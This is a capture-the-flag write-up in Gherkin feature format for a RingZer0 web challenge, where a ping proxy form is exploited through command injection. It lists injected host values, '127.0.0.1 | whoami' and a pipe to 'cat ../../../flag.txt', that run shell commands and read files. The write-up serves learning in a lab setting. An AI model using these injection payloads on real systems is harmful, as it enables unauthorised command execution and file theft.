## Version 2.0
## language: en

Feature: php-feature-or-0day?-ringerzeroctf
  Site:
    https://ringzer0ctf.com/challenges/240
  Category:
    Web
  User:
    john2104
  Goal:
    Get the flag

  Background:
  Hacker's software:
  | <Software name> | <Version>           |
  | NixOS           | 19.09.2260          |
  | Chromium        | 78.0.3904.87        |

  Machine information:
    Given the challenge URL
    """
    https://ringzer0ctf.com/challenges/240
    """
    When I open the url with Chrome
    Then I see a button to other url
    """
    http://challenges.ringzer0team.com:10240/
    """
    And there a message "Send ping through our Proxy."
    And a text input
  Scenario: Fail:command-concat
    Given the web page
    When I try with the well known payload
    """
    127.0.0.1; whoami
    """
    Then I get an error message
    """
    php_network_getaddresses: getaddrinfo failed: Name or service not known
    """
    And I don't solve the challenge

   Scenario: Success:command-execution
    Given the web page
    When I try to use the payload
    """
    127.0.0.1 | whoami
    """
    Then I get the message "www-data"
    And I search through the folders for the flag
    And the flag using "127.0.0.2 | cat ../../../flag.txt"
    Then I solve the challenge
